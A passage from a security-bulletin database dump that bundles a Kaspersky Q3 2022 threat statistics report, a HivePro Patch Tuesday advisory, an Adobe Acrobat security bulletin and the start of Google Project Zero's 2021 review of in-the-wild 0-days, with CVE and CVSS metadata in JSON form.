Attempts to exploit network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which in theory allows remote exploitation of a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed "ProxyNotShell" in reference to the ProxyShell vulnerabilities, which use a similar exploitation technique and were patched earlier. 
Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as "Follina", which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese 
were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack other browsers as long as they run on the same engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. 
Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. 
In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. 
July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking of the biggest threats encountered by users of Kaspersky security solutions for macOS was dominated by adware. AdWare.OSX.Amc.e, touted as "Advanced Mac Cleaner," took the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. 
Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | 
Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users' computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users' computers at least once during Q3. 
Russia scored 16.60% in this ranking.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-18T08:10:34", "type": "securelist", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", "CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-18T08:10:34", "id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "href": 
"https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202129.pdf>)\n\nMultiple vulnerabilities have been patched by Microsoft in August 2021 Patch Tuesday. Three of them have been labeled as zero-day vulnerabilities (CVE-2021-36936, CVE-2021-36942, and CVE-2021-36948). One of them (CVE-2021-36948) has already been exploited in the wild. The attacker is yet to be identified. Microsoft has classified six vulnerabilities as critical, and patches for all of them are now available.\n\n#### Vulnerability Details\n\n \n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34530>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34534>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34480>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34535>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2021-patch-tuesday-fixes-3-zero-days-44-flaws/>", "cvss3": {}, "published": "2021-08-11T13:25:48", "type": "hivepro", "title": "Critical Vulnerabilities revealed in Microsoft\u2019s Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34530", "CVE-2021-34534", 
"CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-11T13:25:48", "id": "HIVEPRO:1BBAC0CD5F3681EC49D06BE85DC90A92", "href": "https://www.hivepro.com/critical-vulnerabilities-revealed-in-microsofts-patch-tuesday/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "adobe": [{"lastseen": "2023-05-27T17:13:01", "description": "Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical]() and [important]() vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "adobe", "title": "APSB21-29 Security\u202fupdate available for Adobe Acrobat and Reader", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], 
"modified": "2021-05-11T00:00:00", "id": "APSB21-29", "href": "https://helpx.adobe.com/security/products/acrobat/apsb21-29.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2023-06-07T14:47:45", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. 
The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. 
Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable. Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. 
So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. 
We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. 
Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. 